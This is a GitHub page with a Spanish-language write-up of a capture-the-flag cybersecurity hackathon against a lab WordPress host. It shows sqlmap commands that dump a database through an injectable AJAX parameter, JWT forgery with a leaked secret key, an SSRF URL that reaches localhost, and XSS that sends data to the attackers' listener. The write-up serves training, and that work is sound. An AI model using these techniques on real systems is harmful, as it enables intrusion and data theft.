Skip to content

Hackathon the Nuwe y Schneider Electric sobre Ciberseguridad

Notifications You must be signed in to change notification settings

GabrielJuan349/Geohome---hackathon

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

15 Commits
 
 
 
 

Repository files navigation

Hackathon NUWE - Schneider Electric

Nombres:

Equipo/Mesa: 58

FLAG{ALWAYS_CHECK_COMMITS}

Para encontrar el git hemos seguido estos pasos:

  • url https definida en http://192.168.56.101/robots.txt
  • Modificar el etc/hosts para añadir 192.168.56.101 wp.geohome.com
  • Accediendo wp.geohome.com, se puede ver un link al github donde está el código fuente en el historial de commits.

imagen del commit donde hemos encontrado el flag

Imagen del commit donde hemos encontrado el flag

FLAG{Update_Plugins!}

python sqlmap.py -u "https://wp.geohome.com/wp-admin/admin-ajax.php?action=get_question&question_id=1" --tables

[20:04:16] [INFO] fetching number of tables for database 'flag' [20:04:16] [INFO] retrieved: 1 [20:04:18] [INFO] retrieved: flag

python sqlmap.py -u "https://wp.geohome.com/wp-admin/admin-ajax.php?action=get_question&question_id=1" --dump -D flag -T flag

[20:20:00] [INFO] fetching entries for table 'flag' in database 'flag' [20:20:00] [INFO] fetching number of entries for table 'flag' in database 'flag' [20:20:00] [INFO] retrieved: 1 [20:20:04] [INFO] retrieved: FLAG{Update_Plugins!}

API_FLAG{Never_public_your_secret}

Aprovechando la información del git donde muestra endpoints de register y login, hemos creado un usuario y nos hemos logeado para conseguir un access_token. Con ese token lo hemos pasado por jwt.io y hemos modificado el usuario por admin, y definido la JWT secret key del github "Ge0HomeIsThePlaceWhereFantasyMeetsReality" y hemos conseguido un nuevo access_token. Con ese nuevo token hemos hecho una petición postman apuntando al endpoint /admin, el endpoint /admin lo hemos recuperado con fuzz. Hacemos el fuzz para encontrar mas endpoints

cambiamos algunas cosas del token(user y le pinemos admin, y ponemos la JWT_SECRET_KEY

FLAG{sanitize_input}

Hacemos cross side scripting para enviar una peticion a nuestro kali

Hacemos cross side scripting para enviar una peticion a nuestro kali

Ponemos un listener en el teminal y cuando se envia la peticion nosotros con el listener la capturamos y conseguimos la flag

Ponemos un listener en el teminal y cuando se envia la peticion nosotros con el listener la capturamos y conseguimos la flag

FLAG{SSRF_PARA_TOD@S_XD}

Cambiamos la url para llegar al sitio concreto cambiando letras y todo

Para conseguir la Flag hemos usado el URL: http://192.168.56.101/testsite.php?url=http://locAlhost:1337

About

Hackathon the Nuwe y Schneider Electric sobre Ciberseguridad

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published